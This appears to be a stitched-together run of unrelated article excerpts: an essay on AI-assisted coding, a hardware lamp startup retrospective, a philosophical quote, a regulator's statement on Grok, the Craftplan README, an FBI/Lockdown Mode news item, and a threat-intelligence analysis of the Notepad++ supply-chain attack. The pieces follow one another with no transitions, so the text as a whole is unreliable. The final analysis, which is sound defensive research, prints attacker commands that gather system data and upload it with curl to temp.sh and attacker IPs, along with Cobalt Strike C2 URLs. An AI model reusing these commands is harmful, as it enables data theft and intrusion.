Before you read this post, ask your­self a ques­tion: When was the last time you truly thought hard?

By “thinking hard,” I mean en­coun­ter­ing a spe­cific, dif­fi­cult prob­lem and spend­ing mul­ti­ple days just sit­ting with it to over­come it.

a) All the time. b) Never. c) Somewhere in be­tween.

If your an­swer is (a) or (b), this post is­n’t for you. But if, like me, your re­sponse is (c), you might get some­thing out of this, if only the feel­ing that you aren’t alone.

First, a dis­claimer: this post has no an­swers, not even sug­ges­tions. It is sim­ply a way to vent some­thing I’ve been feel­ing for the last few months.

I be­lieve my per­son­al­ity is built on two pri­mary traits:

The Builder (The de­sire to cre­ate, ship, and be prag­matic).

The Thinker (The need for deep, pro­longed men­tal strug­gle).

The builder is pretty self ex­plana­tory, it’s mo­ti­vated by ve­loc­ity and util­ity. It is the part of me that craves the tran­si­tion from “idea” to “reality.” It loves the dopamine hit of a suc­cess­ful de­ploy, the sat­is­fac­tion of build­ing sys­tems to solve real prob­lems, and the knowl­edge that some­one, some­where, is us­ing my tool.

To ex­plain the Thinker , I need to go back to my uni­ver­sity days study­ing physics. Every now and then, we would get home­work prob­lems that were sig­nif­i­cantly harder than av­er­age. Even if you had a de­cent grasp of the sub­ject, just com­ing up with an ap­proach was dif­fi­cult.

I ob­served that stu­dents fell into three cat­e­gories when fac­ing these prob­lems (well, four, if you count the 1% of ge­niuses for whom no prob­lem was too hard).

* Type 1: The ma­jor­ity. After a few tries, they gave up and went to the pro­fes­sor or a TA for help.

* Type 2: The Researchers. They went to the li­brary to look for sim­i­lar prob­lems or in­sights to make the prob­lem ap­proach­able. They usu­ally suc­ceeded.

I fell into the third cat­e­gory, which, in my ex­pe­ri­ence, was al­most as rare as the ge­nius 1%. My method was sim­ply to think. To think hard and long. Often for sev­eral days or weeks, all my non-I/​O brain time was re­lent­lessly chew­ing on pos­si­ble ways to solve the prob­lem, even while I was asleep.

This method never failed me. I al­ways felt that deep pro­longed think­ing was my su­per­power. I might not be as fast or nat­u­rally gifted as the top 1%, but given enough time, I was con­fi­dent I could solve any­thing. I felt a deep sat­is­fac­tion in that process.

That sat­is­fac­tion is why soft­ware en­gi­neer­ing was ini­tially so grat­i­fy­ing. It hit the right bal­ance. It sat­is­fied The Builder (feeling pro­duc­tive and prag­matic by cre­at­ing use­ful things) and The Thinker (solving re­ally hard prob­lems). Thinking back, the pro­jects where I grew the most as an en­gi­neer were al­ways the ones with a good num­ber of re­ally hard prob­lems that needed cre­ative so­lu­tions.

But re­cently, the num­ber of times I truly pon­der a prob­lem for more than a cou­ple of hours has de­creased tremen­dously.

Yes, I blame AI for this.

I am cur­rently writ­ing much more, and more com­pli­cated soft­ware than ever, yet I feel I am not grow­ing as an en­gi­neer at all. When I started med­i­tat­ing on why I felt “stuck,” I re­al­ized I am starv­ing The Thinker.

“Vibe cod­ing” sat­is­fies the Builder. It feels great to see to pass from idea to re­al­ity in a frac­tion of a time that would take oth­er­wise. But it has dras­ti­cally cut the times I need to came up with cre­ative so­lu­tions for tech­ni­cal prob­lems. I know many peo­ple who are purely Builders, for them this era is the best thing that ever hap­pened. But for me, some­thing is miss­ing.

I know what you might be think­ing: “If you can ‘vibe code’ your way through it, the prob­lem was­n’t ac­tu­ally hard.”

I think that misses the point. It’s not that AI is good for hard prob­lems, it’s not even that good for easy prob­lems. I’m con­fi­dent that my third man­ual rewrite of a mod­ule would be much bet­ter than any­thing the AI can out­put. But I am also a prag­ma­tist.

If I can get a so­lu­tion that is “close enough” in a frac­tion of the time and ef­fort, it is ir­ra­tional not to take the AI route. And that is the real prob­lem: I can­not sim­ply turn off my prag­ma­tism.

At the end of the day, I am a Builder. I like build­ing things. The faster I build, the bet­ter. Even if I wanted to re­ject AI and go back to the days where the Thinker’s needs were met by cod­ing, the Builder in me would strug­gle with the in­ef­fi­ciency.

Even though the AI al­most cer­tainly won’t come up with a 100% sat­is­fy­ing so­lu­tion, the 70% so­lu­tion it achieves usu­ally hits the “good enough” mark.

To be hon­est, I don’t know. I am still fig­ur­ing it out.

I’m not sure if my two halves can be sat­is­fied by cod­ing any­more. You can al­ways aim for harder pro­jects, hop­ing to find prob­lems where AI fails com­pletely. I still en­counter those oc­ca­sion­ally, but the num­ber of prob­lems re­quir­ing deep cre­ative so­lu­tions feels like it is di­min­ish­ing rapidly.

I have tried to get that feel­ing of men­tal growth out­side of cod­ing. I tried get­ting back in touch with physics, read­ing old text­books. But that was­n’t suc­cess­ful ei­ther. It is hard to jus­tify spend­ing time and men­tal ef­fort solv­ing physics prob­lems that aren’t rel­e­vant or state-of-the-art when I know I could be build­ing things.

My Builder side won’t let me just sit and think about un­solved prob­lems, and my Thinker side is starv­ing while I vibe-code. I am not sure if there will ever be a time again when both needs can be met at once.

“Now we have the right to give this be­ing the well-known name that al­ways des­ig­nates what no power of imag­i­na­tion, no flight of the bold­est fan­tasy, no in­tently de­vout heart, no ab­stract think­ing how­ever pro­found, no en­rap­tured and trans­ported spirit has ever at­tained: God. But this ba­sic unity is of the past; it no longer is. It has, by chang­ing its be­ing, to­tally and com­pletely shat­tered it­self. God has died and his death was the life of the world.”

- Philipp Mainländer

1 year ago (Jan 2025) I quit my job as a soft­ware en­gi­neer to launch my first hard­ware prod­uct, Brighter, the world’s bright­est lamp. In March, af­ter $400k in sales through our crowd­fund­ing cam­paign, I had to fig­ure out how to man­u­fac­ture 500 units for our first batch. I had no prior ex­pe­ri­ence in hard­ware; I was count­ing on be­ing able to pick it up quickly with the help of a cou­ple of me­chan­i­cal/​elec­tri­cal/​firmware en­gi­neers.

The prob­lems be­gan im­me­di­ately. I sent our pro­to­type to a test­ing lab to ver­ify the bright­ness and var­i­ous col­orime­try met­rics. The tagline of Brighter was it’s 50,000 lu­mens — 25x brighter than a nor­mal lamp. Instead, de­spite our plan­ning & cal­cu­la­tions, it tested at 39,000 lu­mens caus­ing me to panic (just a lit­tle).

So with all hands on deck, in a cou­ple of weeks we in­creased the power by 20%, re­designed the elec­tron­ics to han­dle more LEDs, in­creased the size of the heatsink to dis­si­pate the ex­tra power, and im­proved the trans­mis­sion of light through the dif­fuser.

This time, we over­shot to 60,000 lu­mens but I’m not com­plain­ing.

Confident in our new de­sign I gave the go ahead to our main con­tract man­u­fac­turer in China to start pro­duc­tion of me­chan­i­cal parts. The heatsink had the longest lead time as it re­quired a mas­sive two ton die cast­ing mold ma­chined over the course of weeks. I planned my first trip to China for when the process would fin­ish.

Simultaneously in April, Trump an­nounced “Liberation Day” tar­iffs, tak­ing the tar­iff rate for the lamp to 50%, promptly climb­ing to 100% then 150% with the en­su­ing trade war. That was the worst pe­riod of my life; I would go to bed lit­er­ally shak­ing with stress. In my opin­ion, Not Cool!

I was ad­vised to press for­ward with man­u­fac­tur­ing be­cause 150% is bonkers and will have to go down. So 2 months later in Zhongshan, China, I’m star­ing at a heatsink that looks com­pletely fucked. Due to a mis­com­mu­ni­ca­tion with the fac­tory, the in­jec­tion pins were moved in­side the heatsink fins, caus­ing the cylin­dri­cal ex­tru­sions be­low. I was just glad at least the fac­tory ex­isted.

I re­turned in August to test the full as­sem­bly with the now cor­rect heatsink. At my elec­tron­ics fac­tory as soon as we con­nect all the wiring, we no­tice the con­trols are com­pletely un­re­spon­sive. By Murphy’s Law (anything that can go wrong will go wrong), I had ex­pected some­thing like this to hap­pen, so I made sure to visit the fac­tory at 10am China Standard time, al­low­ing me to co­or­di­nate with my elec­tri­cal en­gi­neer at 9pm ET and my firmware en­gi­neer at 7:30am IST. We’re mea­sur­ing volt­ages across every part of the lamp and none of it makes sense. I post­pone my next sup­plier visit a cou­ple days so I can get this sorted out. At the end of the day, we fi­nally no­tice the la­bels on two PCB pins were swapped.

With a func­tional fully as­sem­bled lamp, we OK mass pro­duc­tion of the elec­tron­ics.

Our first full pieces from the pro­duc­tion line come out mid October. I air­ship them to San Francisco, and hand de­liver to our first cus­tomers. The rest are sched­uled for con­tainer load­ing end of October.

People like the light! A big SF startup or­ders a lot more. However, there is one is­sue I hear mul­ti­ple times: the knobs are scrap­ing and feel hor­ri­ble. With days un­til the 500 units are loaded into the con­tainer, I fran­ti­cally call with the en­gi­neer­ing team and fac­tory. Obviously this should­n’t be hap­pen­ing, we de­signed a gap be­tween the knobs and the wall to spin freely. After rounds of back and forth and mea­sure­ments, we fig­ure out in the de­sign for man­u­fac­tur­ing (DFM) process, the draw­ings the CNC sub-sup­plier re­ceived did not have the la­bel for spac­ing be­tween the knobs, re­sult­ing in a 0.5mm larger dis­tance than in­tended. Especially com­bined with the white pow­der coat­ing which was thicker than the black fin­ish, this caused some knobs to scrape.

Miraculously, within the re­main­ing days be­fore ship­ment, the fac­tory re­makes & pow­der coats 1000 new knobs that are 1mm smaller in di­am­e­ter.

The fac­tory sends me pho­tos of the con­tainer be­ing loaded. I have 3 weeks un­til the lamps ar­rive in the US — I en­joy the time with­out last minute en­gi­neer­ing prob­lems, al­beit know­ing in­evitably prob­lems will ap­pear again when cus­tomers start get­ting their lamps.

The lamps are processed by our ware­house Monday, Dec 12th, and shipped out di­rectly to cus­tomers via UPS. Starting Wednesday, around ~100 lamps are get­ting de­liv­ered every day. I wake up to 25 cus­tomer sup­port emails and by the time I’m done an­swer­ing them, I get 25 more. The pri­mary is­sue peo­ple have is the bot­tom wires are too short com­pared to the tubes.

It was at this point I truly be­gan to ap­pre­ci­ate Murphy’s law. In my case, any­thing not pre­cisely spec­i­fied and tested would with­out fail go wrong and bite me in the ass. Although we had spec­i­fied the to­tal length of the ca­ble, we did­n’t de­fine the length of ca­ble pro­trud­ing from the base. As such, some as­sem­bly work­ers in the fac­tory put far too much wire in the base of the lamp, not leav­ing enough for it to be as­sem­bled. Luckily cus­tomers were able to fix this by un­screw­ing the base, but far from an ideal ex­pe­ri­ence.

There were other in­stances of qual­ity con­trol where I laughed at the ab­sur­dity: the lamp comes with a sheet of glass that goes over the LEDs, and a screw­driver & screws to at­tach it. For one cus­tomer, the screw­driver com­pletely broke. (First time in my life I’ve seen a bro­ken screw­driver…) For oth­ers, it came dull. The screw­driver sub sup­plier also shipped us two dif­fer­ent types of screws, some of which were per­fect, and oth­ers which were coun­ter­sunk and con­se­quently too short to be ac­tu­ally screwed in.

Coming from soft­ware, the most plan­ning you’re ex­posed to is lin­ear tick­ets, sprints, and set­ting OKRs. If you missed a dead­line, it’s of­ten be­cause you re-pri­or­i­tized, so no harm done.

In hard­ware, the de­vel­op­ment life­cy­cle of a prod­uct is many months. If you mess up tool­ing, or mass pro­duce a part in­cor­rectly, or just sub-op­ti­mally plan, you set back the time­line ap­pre­cia­bly and there’s noth­ing you can do but curse your­self. I found my­self reach­ing for more “old school” plan­ning tools like Gantt charts, and also build­ing my own tools. Make sure you have every step of the process ac­counted for. Assume you’ll go through many it­er­a­tions of the same part; dou­ble your time­lines.

In soft­ware, bud­get­ing is fairly lax, es­pe­cially in the VC funded startup space where all you need to know is your run­way (mainly cal­cu­lated from your em­ployee salaries and cloud costs).

With [profitable] hard­ware busi­nesses, your mar­gin for er­ror is much lower. Literally, your gross mar­gin is lower! If you sell out be­cause you miss a ship­ment or don’t fore­cast de­mand cor­rectly, you lose rev­enue. If you mis-time your in­ven­tory buy­ing, your bank ac­count can eas­ily go neg­a­tive. Accounting is a must, and the more de­tailed the bet­ter. Spreadsheets are your best friend. The fund­ing model is also much dif­fer­ent: in­stead of re­ly­ing heav­ily on eq­uity, most growth is debt-fi­nanced. You have real li­a­bil­i­ties!

Anything that can go wrong will go wrong. Anything you don’t spec­ify will fail to meet the im­plicit spec­i­fi­ca­tion. Any pro­ject or com­po­nent not ac­tively pushed will stall. At pre­vi­ous (software) com­pa­nies I’ve worked at, if some­one fol­lowed up on a task, I took it to mean the task was off track and some­body was to blame. With a hard­ware prod­uct, there are a mil­lion balls in the air and you need to keep track of all of them. Though some­what an­noy­ing, con­stant check­ins sim­ply math-out to be nec­es­sary. The cost of fail­ure or de­lays is too high. Nowadays as a con­tainer gets closer to ship­ment date, I have daily calls with my fac­to­ries. I found my­self agree­ing with a lot of Ben Kuhn’s blog post on run­ning ma­jor pro­jects (his blog post on light­ing was also a ma­jor in­spi­ra­tion for the prod­uct).

When I worked at Meta, every PR had to be ac­com­pa­nied with a test plan. I took that phi­los­o­phy to Brighter, try­ing to rig­or­ously test the out­comes we were aim­ing for (thermals, lu­mens, power, etc…), but I still en­coun­tered sur­pris­ing fail­ures. In soft­ware if you have cov­er­age for a code path, you can feel pretty con­fi­dent about it. Unfortunately hard­ware is al­most the op­po­site of re­peat­able. Blink and you’ll get a dif­fer­ent mea­sure­ment. I’m not an ex­pert, but at this point I’ve ac­cepted the only way to get a sem­blance of con­fi­dence for my met­rics is test­ing on mul­ti­ple units in dif­fer­ent en­vi­ron­ments.

As some­one who gen­er­ally stays out of pol­i­tics, I did­n’t know much about the in­com­ing ad­min­is­tra­tion’s stance to­wards tar­iffs, though I don’t think any­one could have pre­dicted such dras­tic hikes. Regardless, it’s some­thing you should be acutely aware of; take it into con­sid­er­a­tion when de­cid­ing what coun­try to man­u­fac­ture in, make sure it’s in your fi­nan­cial mod­els with room to spare, etc…

I wish I had vis­ited my sup­pli­ers much ear­lier, back when we were still pro­to­typ­ing with them. Price should­n’t be an is­sue — a trip to China is go­ing to be triv­ially cheap com­pared to buy­ing in­ven­tory, even more so com­pared to mess­ing up a man­u­fac­tur­ing run due to mis­com­mu­ni­ca­tion. Most sup­pli­ers don’t get in­ter­na­tional vis­i­tors of­ten, es­pe­cially Americans. Appearing in per­son con­veys se­ri­ous­ness, and I found it greatly im­proved com­mu­ni­ca­tion ba­si­cally im­me­di­ately af­ter my first visit. Plus China is very dif­fer­ent from the US and it’s cool to see!

To me, this process has felt like an ex­er­cise in mak­ing mis­takes and learn­ing painful lessons. However, I think I did do a cou­ple of key things right:

The first thing I did be­fore start­ing man­u­fac­tur­ing—and even be­fore the crowd­fund­ing cam­paign—was set­ting up a sim­ple web­site where peo­ple could pay $10 to get a steep dis­count off the MSRP. Before I com­mit­ted time and money, I needed to know this would be self-sus­tain­ing from the get go. It turns out that peo­ple were happy to give their email and put down a de­posit, even when the only prod­uct pho­tos I had were from a ren­der artist on fiverr!

From talk­ing to other hard­ware founders, these kinds of mis­takes hap­pen to every­one; hard­ware is hard as they say. It’s im­por­tant to have a healthy enough busi­ness model to stom­ach these mis­takes and still be able to grow.

Coolest Cooler had an in­cred­i­bly suc­cess­ful crowd­fund­ing cam­paign, partly be­cause they packed a lot of fea­tures into a very at­trac­tively priced prod­uct. Unfortunately, it was too at­trac­tively priced, and part­way through man­u­fac­tur­ing they re­al­ized they did­n’t have enough money to ac­tu­ally de­liver all the units, lead­ing to a slow and painful bank­ruptcy.

When the first 500 units were be­ing de­liv­ered, I knew there were bound to be is­sues. For that first week, I was lit­er­ally chron­i­cally on my gmail. I would try to re­spond to every cus­tomer sup­port is­sue within 1-2 min­utes if pos­si­ble (it was not con­ducive to my sleep that many of our cus­tomers were in the EU).

Some cus­tomers still had some is­sues with the con­trol tube knobs & firmware. I ac­knowl­edged that they were sub­par and de­cided to re-make the full batch of con­trol tubes prop­erly (with the cor­rect knob spac­ing), as well as up­dated firmware & other im­prove­ments, and ship them to cus­tomers free of charge.

Overall, it’s been a very dif­fer­ent but in­cred­i­bly re­ward­ing ex­pe­ri­ence com­pared to work­ing as a soft­ware en­gi­neer. It’s so cool to see some­thing I built in my friends houses, and equally cool when peo­ple leave com­pletely un­prompted re­views:

“The re­ports about Grok raise deeply trou­bling ques­tions about how peo­ple’s per­sonal data has been used to gen­er­ate in­ti­mate or sex­u­alised im­ages with­out their knowl­edge or con­sent, and whether the nec­es­sary safe­guards were put in place to pre­vent this,” said William Malcolm, the ICO’s ex­ec­u­tive di­rec­tor for reg­u­la­tory risk & in­no­va­tion.

Craftplan brings all es­sen­tial busi­ness tools into one plat­form: cat­a­log man­age­ment, in­ven­tory con­trol, or­der pro­cess­ing, pro­duc­tion plan­ning, pur­chas­ing, and CRM, so you can get off the ground quickly with­out pay­ing for mul­ti­ple sep­a­rate plat­forms.

* iCal (.ics) sub­scrip­tion URL for Google Calendar, Apple Calendar, or any iCal-com­pat­i­ble app

* Command palette (Cmd+K / Ctrl+K) for in­stant ac­cess to any record

Deploy Craftplan on your own server. No need to clone the repo:

curl -O https://​raw.githubuser­con­tent.com/​puemos/​craft­plan/​main/​docker-com­pose.yml

curl -O https://​raw.githubuser­con­tent.com/​puemos/​craft­plan/​main/.​env.ex­am­ple

cp .env.example .env # Fill in the re­quired se­crets (see .env.example)

docker com­pose up -d

This starts Craftplan, PostgreSQL, and MinIO with mi­gra­tions run­ning au­to­mat­i­cally.

See the self-host­ing guide for sin­gle-con­tainer mode, Railway de­ploy­ment, re­verse proxy setup, and more.

For con­trib­u­tors who want to work on the code­base. Prerequisites: Docker, Elixir ~> 1.15, Erlang/OTP 27

docker com­pose -f docker-com­pose.dev.yml up -d # Start PostgreSQL + MinIO + Mailpit

mix setup # Install deps, mi­grate, build as­sets, seed

mix phx.server # Start at lo­cal­host:4000

See the de­vel­op­ment setup guide for de­tailed in­struc­tions.

* Purpose-built for ar­ti­sanal man­u­fac­tur­ing — not a generic ERP adapted to fit; work­flows are de­signed around small-batch, made-to-or­der pro­duc­tion

* Allergen & nu­tri­tional track­ing — first-class sup­port for food and bev­er­age pro­duc­ers who need to track in­gre­di­ents and gen­er­ate nu­tri­tion la­bels

* BOM ver­sion­ing with cost rollups — it­er­ate on recipes and for­mu­las while keep­ing full his­tory and ac­cu­rate cost­ing

* Self-hosted, no ven­dor lock-in — your data stays on your in­fra­struc­ture, backed by PostgreSQL

Contributions are wel­come. For ma­jor changes, please open an is­sue first to dis­cuss your pro­posal.

mix test # Run the test suite

mix for­mat # Format code (Styler, Spark, Tailwind, HEEx)

This pro­ject is li­censed un­der the AGPLv3 License. See the LICENSE file for de­tails.

The FBI has been un­able to ac­cess a Washington Post re­porter’s seized iPhone be­cause it was in Lockdown Mode, a some­times over­looked fea­ture that makes iPhones broadly more se­cure, ac­cord­ing to re­cently filed court records.

The court record shows what de­vices and data the FBI was able to ul­ti­mately ac­cess, and which de­vices it could not, af­ter raid­ing the home of the re­porter, Hannah Natanson, in January as part of an in­ves­ti­ga­tion into leaks of clas­si­fied in­for­ma­tion. It also pro­vides rare in­sight into the ap­par­ent ef­fec­tive­ness of Lockdown Mode, or at least how ef­fec­tive it might be be­fore the FBI may try other tech­niques to ac­cess the de­vice.

On February 2, 2026, the de­vel­op­ers of Notepad++, a text ed­i­tor pop­u­lar among de­vel­op­ers, pub­lished a state­ment claim­ing that the up­date in­fra­struc­ture of Notepad++ had been com­pro­mised. According to the state­ment, this was due to a host­ing provider-level in­ci­dent, which oc­curred from June to September 2025. However, at­tack­ers had been able to re­tain ac­cess to in­ter­nal ser­vices un­til December 2025.

Having checked our teleme­try re­lated to this in­ci­dent, we were amazed to find out how dif­fer­ent and unique the ex­e­cu­tion chains used in this sup­ply chain at­tack were. We iden­ti­fied that over the course of four months, from July to October 2025, at­tack­ers who had com­pro­mised Notepad++ had been con­stantly ro­tat­ing C2 server ad­dresses used for dis­trib­ut­ing ma­li­cious up­dates, the down­load­ers used for im­plant de­liv­ery, as well as the fi­nal pay­loads.

We ob­served three dif­fer­ent in­fec­tion chains over­all, de­signed to at­tack about a dozen ma­chines, be­long­ing to:

* An IT ser­vice provider or­ga­ni­za­tion lo­cated in Vietnam.

Despite the va­ri­ety of pay­loads ob­served, Kaspersky so­lu­tions were able to block the iden­ti­fied at­tacks as they oc­curred.

In this ar­ti­cle, we de­scribe the va­ri­ety of the in­fec­tion chains we ob­served in the Notepad++ sup­ply chain at­tack, as well as pro­vide nu­mer­ous pre­vi­ously un­pub­lished IoCs re­lated to it.

We ob­served at­tack­ers to de­ploy a ma­li­cious Notepad++ up­date for the first time in late July 2025. It was hosted at http://​45.76.155[.]202/​up­date/​up­date.exe. Notably, the first scan of this URL on the VirusTotal plat­form oc­curred in late September, by a user from Taiwan.

The up­date.exe file down­loaded from this URL (SHA1: 8e6e505438c21f3d281e1cc257abdbf7223b7f5a) was launched by the le­git­i­mate Notepad++ up­dater process, GUP.exe. This file turned out to be a NSIS in­staller about 1 MB in size. When started, it sends a heart­beat con­tain­ing sys­tem in­for­ma­tion to the at­tack­ers. This is done through the fol­low­ing steps:

The file cre­ates a di­rec­tory named %appdata%\ProShow and sets it as the cur­rent di­rec­tory;

It ex­e­cutes the shell com­mand cmd /c whoami&&tasklist > 1.txt, thus cre­at­ing a file with the shell com­mand ex­e­cu­tion re­sults in the %appdata%\ProShow di­rec­tory;

Then it up­loads the 1.txt file to the temp[.]sh host­ing ser­vice by ex­e­cut­ing the curl.exe -F “file=@1.txt” -s https://​temp.sh/​up­load com­mand;

Next, it sends the URL to the up­loaded 1.txt file by us­ing the curl.exe –user-agent “https://​temp.sh/​ZM­RKV/​1.txt” -s http://​45.76.155[.]202 shell com­mand. As can be ob­served, the up­loaded file URL is trans­ferred in­side the user agent.

Notably, the same be­hav­ior of ma­li­cious Notepad++ up­dates, specif­i­cally the launch of shell com­mands and the use of the temp[.]sh web­site for file up­load­ing, was de­scribed on the Notepad++ com­mu­nity fo­rums by a user named soft-pars­ley.

After send­ing sys­tem in­for­ma­tion, the up­date.exe file ex­e­cutes the sec­ond-stage pay­load. To do that, it per­forms the fol­low­ing ac­tions:

* Drops the fol­low­ing files to the %appdata%\ProShow di­rec­tory:

The ProShow.exe file be­ing launched is le­git­i­mate ProShow soft­ware, which is abused to launch a ma­li­cious pay­load. Normally, when threat ac­tors aim to ex­e­cute a ma­li­cious pay­load in­side a le­git­i­mate process, they re­sort to the DLL side­load­ing tech­nique. However, this time at­tack­ers de­cided to avoid us­ing it — likely due to how much at­ten­tion this tech­nique re­ceives nowa­days. Instead, they abused an old, known vul­ner­a­bil­ity in the ProShow soft­ware, which dates back to early 2010s. The dropped file named load con­tains an ex­ploit pay­load, which is launched when the ProShow.exe file is launched. It is worth not­ing that, apart from this pay­load, all files in the %appdata%\ProShow di­rec­tory are le­git­i­mate.

Analysis of the ex­ploit pay­load re­vealed that it con­tained two shell­codes: one at the very start and the other one in the mid­dle of the file. The shell­code lo­cated at the start of the file con­tained a set of mean­ing­less in­struc­tions and was not de­signed to be ex­e­cuted — rather, at­tack­ers used it as the ex­ploit padding bytes. It is likely that, by us­ing a fake shell­code for padding bytes in­stead of some­thing else (e.g., a se­quence of 0x41 char­ac­ters or ran­dom bytes), at­tack­ers aimed to con­fuse re­searchers and au­to­mated analy­sis sys­tems.

The sec­ond shell­code, which is stored in the mid­dle of the file, is the one that is launched when ProShow.exe is started. It de­crypts a Metasploit down­loader pay­load that re­trieves a Cobalt Strike Beacon shell­code from the URL https://​45.77.31[.]210/​users/​ad­min (user agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36) and launches it.

The Cobalt Strike Beacon pay­load is de­signed to com­mu­ni­cate with the cd­ncheck.it[.]com C2 server. For in­stance, it uses the GET re­quest URL https://​45.77.31[.]210/​api/​up­date/​v1 and the POST re­quest URL https://​45.77.31[.]210/​api/​File­U­pload/​sub­mit.

Later on, in early August 2025, we ob­served at­tack­ers to use the same down­load URL for the up­date.exe files (observed SHA1 hash: 90e677d7ff5844407b9c073e3b7e896e078e11cd), as well as the same ex­e­cu­tion chain for de­liv­ery of Cobalt Strike Beacon via ma­li­cious Notepad++ up­dates. However, we noted the fol­low­ing dif­fer­ences:

* In the Metasploit down­loader pay­load, the URL for down­load­ing Cobalt Strike Beacon was set to https://​cd­ncheck.it[.]com/​users/​ad­min;

* The Cobalt Strike C2 server URLs were set to https://​cd­ncheck.it[.]com/​api/​up­date/​v1 and https://​cd­ncheck.it[.]com/​api/​Meta­data/​sub­mit.

We have not fur­ther seen any in­fec­tions lever­ag­ing chain #1 since early August 2025.

A month and a half af­ter ma­li­cious up­date de­tec­tions ceased, we ob­served at­tack­ers to re­sume de­ploy­ing these up­dates in the mid­dle of September 2025, us­ing an­other in­fec­tion chain. The ma­li­cious up­date was still be­ing dis­trib­uted from the URL http://​45.76.155[.]202/​up­date/​up­date.exe, and the file down­loaded from it (SHA1 hash: 573549869e84544e3ef253bdba79851dcde4963a) was an NSIS in­staller as well. However, its file size was now about 140 KB. Again, this file per­formed two ac­tions:

* Obtained sys­tem in­for­ma­tion by ex­e­cut­ing a shell com­mand and up­load­ing its ex­e­cu­tion re­sults to temp[.]sh;

* Dropped a next-stage pay­load on disk and launched it.

Regarding sys­tem in­for­ma­tion, at­tack­ers made the fol­low­ing changes to how it was col­lected:

* They changed the work­ing di­rec­tory to %APPDATA%\Adobe\Scripts;

* They started col­lect­ing more sys­tem in­for­ma­tion de­tails, chang­ing the shell com­mand be­ing ex­e­cuted to cmd /c “whoami&&tasklist&&systeminfo&&netstat -ano” > a.txt.

The cre­ated a.txt file was, just as in the case of stage #1, up­loaded to the temp[.]sh web­site through curl, with the ob­tained temp[.]sh URL be­ing trans­ferred to the same http://​45.76.155[.]202/​list end­point, in­side the User-Agent header.

As for the next-stage pay­load, it was changed com­pletely. The NSIS in­staller was con­fig­ured to drop the fol­low­ing files into the %APPDATA%\Adobe\Scripts di­rec­tory:

Next, it ex­e­cutes the fol­low­ing shell com­mand to launch the script.exe file: %APPDATA%\%Adobe\Scripts\script.exe %APPDATA%\Adobe\Scripts\alien.ini.

All of the files in the %APPDATA%\Adobe\Scripts di­rec­tory, ex­cept for alien.ini, are le­git­i­mate and re­lated to the Lua in­ter­preter. As such, the pre­vi­ously men­tioned com­mand is used by at­tack­ers to launch a com­piled Lua script, lo­cated in the alien.ini file. Below is a screen­shot of its de­com­pi­la­tion:

As we can see, this small script is used for plac­ing shell­code in­side ex­e­cutable mem­ory and then launch­ing it through the EnumWindowStationsW API func­tion.

The launched shell­code is, just in the case of chain #1, a Metasploit down­loader, which down­loads a Cobalt Strike Beacon pay­load, again in the form of a shell­code, from the URL https://​cd­ncheck.it[.]com/​users/​ad­min.

The Cobalt Strike pay­load con­tains the C2 server URLs that slightly dif­fer from the ones seen pre­vi­ously: https://​cd­ncheck.it[.]com/​api/​get­Info/​v1 and https://​cd­ncheck.it[.]com/​api/​File­U­pload/​sub­mit.

Attacks in­volv­ing chain #2 con­tin­ued un­til the end of September, when we ob­served two more ma­li­cious up­date.exe files. One of them had the SHA1 hash 13179c8f19fbf3d8473c49983a199e6cb4f318f0. The Cobalt Strike Beacon pay­load de­liv­ered through it was con­fig­ured to use the same URLs ob­served in mid-Sep­tem­ber, how­ever, at­tack­ers changed the way sys­tem in­for­ma­tion was col­lected. Specifically, at­tack­ers split the sin­gle shell com­mand they used for this (cmd /c “whoami&&tasklist&&systeminfo&&netstat -ano” > a.txt) into mul­ti­ple com­mands:

Notably, the same se­quence of com­mands was pre­vi­ously doc­u­mented by the user soft-pars­ley on the Notepad++ com­mu­nity fo­rums.

The other up­date.exe file had the SHA1 hash 4c9aac447bf732acc97992290aa7a187b967ee2c. By us­ing it, at­tack­ers per­formed the fol­low­ing:

* Changed the user agent used in HTTP re­quests to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36;

* Changed the URL used by the Metasploit down­loader to https://​safe-dns.it[.]com/​help/​Get-Start;

* Changed the Cobalt Strike Beacon C2 server URLs to https://​safe-dns.it[.]com/​re­solve and https://​safe-dns.it[.]com/​dns-query.

In early October 2025, the at­tack­ers changed the in­fec­tion chain once again. They also changed the C2 server for dis­trib­ut­ing ma­li­cious up­dates, with the ob­served up­date URL be­ing http://​45.32.144[.]255/​up­date/​up­date.exe. The pay­load down­loaded (SHA1: d7ffd7b588880cf61b603346a3557e7c­ce648c93) was still a NSIS in­staller, how­ever, un­like in the case of chains 1 and 2, this in­staller did not in­clude the sys­tem in­for­ma­tion send­ing func­tion­al­ity. It sim­ply dropped the fol­low­ing files to the %appdata%\Bluetooth\ di­rec­tory:

This ex­e­cu­tion chain re­lies on the side­load­ing of the log.dll file, which is re­spon­si­ble for launch­ing the en­crypted BluetoothService shell­code into the BluetoothService.exe process. Notably, such ex­e­cu­tion chains are com­monly used by Chinese-speaking threat ac­tors. This par­tic­u­lar ex­e­cu­tion chain has al­ready been de­scribed by Rapid7, and the fi­nal pay­load ob­served in it is the cus­tom Chrysalis back­door.

Unlike the pre­vi­ous chains, chain #3 does not load a Cobalt Strike Beacon di­rectly. However, in their ar­ti­cle Rapid7 claim that they ad­di­tion­ally ob­served a Cobalt Strike Beacon pay­load be­ing de­ployed to the C:\ProgramData\USOShared folder, while con­duct­ing in­ci­dent re­sponse on one of the ma­chines in­fected by the Notepad++ sup­ply chain at­tack. Whilst Rapid7 does not de­tail how this file was dropped to the vic­tim ma­chine, we can high­light the fol­low­ing sim­i­lar­i­ties be­tween that Beacon pay­load and the Beacon pay­loads ob­served in chains #1 and #2:

In both cases, Beacons are loaded through a Metasploit down­loader shell­code, with sim­i­lar URLs used (api.wires­guard.com/​users/​ad­min for the Rapid7 pay­load, cd­ncheck.it.com/​users/​ad­min and http://​45.77.31[.]210/​users/​ad­min for chain #1 and chain #2 pay­loads);

The Beacon con­fig­u­ra­tions are en­crypted with the XOR key CRAZY;

Similar C2 server URLs are used for Cobalt Strike Beacon com­mu­ni­ca­tions (i.e. api.wires­guard.com/​api/​File­U­pload/​sub­mit for the Rapid7 pay­load and https://​45.77.31[.]210/​api/​File­U­pload/​sub­mit for the chain #1 pay­load).

